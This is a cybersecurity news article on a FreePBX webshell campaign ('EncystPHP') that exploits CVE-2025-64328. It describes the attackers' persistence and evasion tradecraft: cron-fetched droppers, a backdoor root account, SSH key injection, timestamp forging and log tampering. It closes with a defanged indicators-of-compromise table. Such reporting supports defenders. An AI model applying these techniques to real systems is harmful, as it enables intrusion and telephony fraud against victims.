A sophisticated attack campaign leveraging a critical FreePBX vulnerability to deploy a persistent webshell dubbed “EncystPHP,” enabling threat actors to gain complete administrative control over compromised VoIP systems.
The campaign, launched in early December 2025, exploits CVE-2025-64328, a post-authentication command-injection flaw in the FreePBX Endpoint Manager’s administrative interface.
The malicious activity is attributed to INJ3CTOR3, a financially motivated hacker group first identified in 2020 when they targeted CVE-2019-19006 in FreePBX systems.
In 2022, the threat actor evolved their tactics by shifting focus to Elastix systems through the exploitation of CVE-2021-45461. The group has consistently demonstrated a pattern of targeting VoIP infrastructure for monetization purposes, primarily through unauthorized call generation and toll fraud.
Vulnerability Exploitation and Initial Access
CVE-2025-64328 is classified as a critical command injection vulnerability in the Endpoint Manager module, specifically within the check_ssh_connect() function of the Filestore component.
The vulnerability allows authenticated attackers to execute arbitrary shell commands as the asterisk user, providing a foothold for deeper system compromise. Attack traffic originated from Brazil and targeted victim environments managed by an Indian technology company specializing in cloud solutions and communication services.
Fortinet observed that the attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, which resolves to the domain crm[.]razatelefonia[.]pro, a website masquerading as a VoIP management system with login functionality. When accessing the route “new/” on the download source, requests are automatically redirected to another dropper named k.php.
The EncystPHP webshell exhibits advanced capabilities, including remote command execution, multi-stage persistence mechanisms, and sophisticated evasion techniques.
Upon deployment, the malware modifies file permissions of legitimate FreePBX components to prevent detection and removes competing webshells from the compromised system.
The webshell establishes persistence by creating a root-level user account named “newfpbx” with hardcoded credentials, resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access. The malware also modifies system configurations to ensure SSH port 22 remains open, providing continuous remote access for the attackers.
EncystPHP masquerades as a legitimate FreePBX file named ajax.php, allowing it to blend seamlessly into the application structure and evade casual inspection. The webshell employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code.
Once authenticated, the webshell exposes an interactive interface titled “Ask Master” that includes predefined operational commands for file system enumeration, process inspection, querying active Asterisk channels, listing SIP peers, and retrieving FreePBX and Elastix configuration files.
By leveraging elevated privileges within the Elastix and FreePBX administrative contexts, the webshell enables arbitrary command execution and initiates outbound call activity through the compromised PBX environment.
Multi-Stage Persistence Architecture
The attack implements a four-stage persistence mechanism to ensure long-term access. Initial persistence is established through crontab entries that download the secondary dropper k.php every minute.
Subsequent stages deploy additional droppers across multiple directories under /var/www/html/, including digium_phones/, rest_phones/, phones/, and freepbxphones/, creating redundant access points that increase resilience against removal attempts.
The malware forges timestamps to match legitimate files and deploys webshell instances to at least twelve different file paths, ensuring alternative access routes remain available if primary instances are detected and removed. EncystPHP also tampers with log files and disables error reporting to hinder forensic analysis and detection efforts.
Organizations operating unpatched FreePBX systems should treat any successful exploitation as a full compromise requiring immediate remediation, comprehensive monitoring, and security hardening.
The incident underscores that VoIP and PBX systems remain high-value targets for threat actors seeking to monetize unauthorized access through toll fraud and abuse of telephony resources.
Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| URL | hxxp://45[.]234[.]176[.]202/new/c | EncystPHP dropper download location |
| URL | hxxp://45[.]234[.]176[.]202/new/k.php | Secondary dropper download location |
| Domain | crm[.]razatelefonia[.]pro | Malicious domain resolving to C2 server |
| IPv4 | 45[.]234[.]176[.]202 | Command-and-control server IP address |
| IPv4 | 187[.]108[.]1[.]130 | Associated malicious infrastructure |
| SHA256 | 71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302 | EncystPHP webshell component |
| SHA256 | 7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574 | Dropper component file hash |
| SHA256 | fc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2 | Persistence script file hash |
| SHA256 | 285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2 | Configuration component hash |
| SHA256 | 29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7 | Additional malware component |
| File Path | /var/www/html/admin/views/ajax.php | Primary webshell deployment location |
| File Path | /var/www/html/rest_phones/ajax.php | Alternative webshell deployment path |
| File Path | /var/www/html/admin/modules/core/ajax.php | Webshell persistence location |
| User Account | newfpbx | Malicious root-level user account |
| CVE | CVE-2025-64328 | Exploited FreePBX vulnerability |
| Detection | PHP/EncystPHP.A!tr | FortiGuard Antivirus signature |
| Detection | BASH/EncystPHP.A!tr | FortiGuard Antivirus signature |
| IPS Signature | 59448 | FreePBX.Administration.GUI.filestore.Command.Injection |
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
